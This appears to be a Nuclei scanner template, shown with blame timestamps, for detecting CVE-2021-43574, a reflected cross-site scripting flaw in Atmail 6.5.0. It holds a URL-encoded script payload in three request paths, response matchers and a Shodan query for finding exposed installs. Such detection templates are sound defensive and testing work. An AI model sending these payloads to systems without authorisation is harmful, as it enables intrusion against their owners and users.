2022-09-01 06:16:54 +00:00
id : CVE-2021-43574
info :
2022-09-10 01:55:52 +00:00
name : Atmail 6.5.0 - Cross-Site Scripting
2022-09-01 06:34:48 +00:00
author : arafatansari,ritikchaddha
2022-09-10 02:12:57 +00:00
severity : medium
2022-09-01 06:16:54 +00:00
description : |
2022-09-10 01:55:52 +00:00
Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability.
2022-09-01 06:16:54 +00:00
reference :
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
2022-09-01 11:20:25 +00:00
- https://help.atmail.com/hc/en-us/sections/115003283988
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
2022-09-01 06:34:48 +00:00
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2021-43574
2022-09-10 02:12:57 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00145
2023-10-31 18:27:55 +00:00
epss-percentile : 0.50128
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
2022-09-01 06:16:54 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : atmail
product : atmail
2023-09-06 12:09:01 +00:00
shodan-query : http.html:"Powered by Atmail"
2022-09-01 06:34:48 +00:00
tags : cve,cve2021,atmail,xss
2022-09-01 06:16:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-01 06:34:48 +00:00
- method : GET
path :
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-09-01 06:16:54 +00:00
2022-09-01 06:34:48 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-09-01 06:16:54 +00:00
matchers-condition : and
matchers :
2022-09-01 06:34:48 +00:00
- type : word
part : body
words :
- '<script>alert(document.domain)</script>" does not exist'
2022-09-01 06:16:54 +00:00
- type : word
2022-09-01 06:34:48 +00:00
part : header
2022-09-01 06:16:54 +00:00
words :
2022-09-01 06:34:48 +00:00
- text/html
- type : status
status :
- 500
- 403
condition : or
2023-11-01 14:09:41 +00:00
# digest: 4b0a004830460221008d86e6b9972c4b6851ebc6e683ff64f3559305b6498758f7fa9ad73c65bbf56a0221009d3cdc08ac751399503fd12876020fd0f9ccb8ba1261be7b780ca5b6ac6644bd:922c64590222798bb761d5b6d8e72950